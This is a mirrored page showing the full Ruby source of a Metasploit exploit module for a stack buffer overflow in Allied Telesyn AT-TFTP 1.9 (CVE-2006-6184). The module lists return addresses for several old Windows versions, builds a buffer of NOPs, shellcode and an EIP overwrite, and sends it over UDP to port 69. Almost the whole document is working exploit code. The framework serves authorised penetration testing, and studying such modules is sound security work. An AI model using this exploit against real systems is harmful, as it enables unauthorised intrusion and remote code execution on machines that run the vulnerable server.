Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/attftp_long_filename.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a

18
          request (get/write) for an overly long file name.

19
        },

20
        'Author' => [ 'aushack' ],

21
        'References' => [

22
          ['CVE', '2006-6184'],

23
          ['OSVDB', '11350'],

24
          ['BID', '21320'],

25
          ['EDB', '2887']

26
        ],

27
        'DefaultOptions' => {

28
          'EXITFUNC' => 'process',

29
        },

30
        'Payload' => {

31
          'Space' => 210,

32
          'BadChars' => "\x00",

33
          'StackAdjustment' => -3500,

34
        },

35
        'Platform' => 'win',

36
        'Targets' => [

37
          # Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24

38
          [ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ],

39
          [ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ],

40
          [ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ],

41
          [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ],

42
          [ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ],

43
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],

44
          [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ],

45
          [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],

46
          [ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re

47
          [ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert

48
          [ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear

49
        ],

50
        'Privileged' => false,

51
        'DisclosureDate' => '2006-11-27',

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        Opt::RPORT(69),

63
        Opt::LHOST() # Required for stack offset

64
      ]

65
    )

66
  end

67


68
  def exploit

69
    connect_udp

70


71
    sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)

72
    sploit << payload.encoded

73
    sploit << [target['Ret']].pack('V')	# <-- eip = jmp esp. we control it.

74
    sploit << "\x83\xc4\x28\xc3"	# <-- esp = add esp 0x28 + retn

75
    sploit << "\x00" + "netascii" + "\x00"

76


77
    udp_sock.put(sploit)

78


79
    disconnect_udp

80
  end

81
end

82


83